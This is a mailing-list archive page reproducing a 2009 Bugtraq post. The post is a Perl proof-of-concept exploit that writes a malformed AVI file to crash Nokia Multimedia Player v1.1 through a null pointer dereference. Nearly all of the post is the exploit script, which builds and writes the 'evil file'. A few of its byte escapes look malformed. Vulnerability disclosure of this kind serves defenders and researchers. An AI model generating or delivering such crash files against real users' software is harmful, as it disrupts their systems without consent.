lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <200901251415.n0PEFtMv026738@www5.securityfocus.com>
Date: Sun, 25 Jan 2009 07:15:55 -0700
From: alphanix00@...il.com
To: bugtraq@...urityfocus.com
Subject: Nokia Multimedia Player (.AVI File) Null Dereference Pointer Exploit

#!/usr/local/bin/perl
#
# Application    : Nokia Multimedia Player
# Version        : v 1.1
# Bug            : Local (.AVI File) Null Dereference Pointer Exploit
# Exploit Method : Local
# Author         : Null Area Security
#                  Zigma [zigmatn @ gmail.com]
# IRC            : irc://irc.nullarea.org/#nullarea
# Home           : http://NullArea.NET
#
# Description    : Opening a malformed .AVI file with Nokia Multimedia Player version 1.1 causes it to point to Null Pointer [00000000] which leads to crash the application .
#
# " Access violation when reading [00000000] - "
#
$area = "ndpe.avi";

$null = "\x4A\x75\x73\x74\x00\x41\x6E\x79\x74\x68\x69\6E\x76\x00".
        "\x54\x75\x6E\x96\73\x69\x61\x00\x52\x75\x6C\x6C\x7A\x7A";

print "\nFuzzing Nokia Multimedia Player v 1.1\r";
print "\n\n[+] Evil file to make : $area ...\r\n";
sleep(2);

open(avi, ">./$area") || die "\nCannot open $area: $!";

print avi "$null";

close (avi);

print "\n[+] File $area successfully created!\r\n";

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ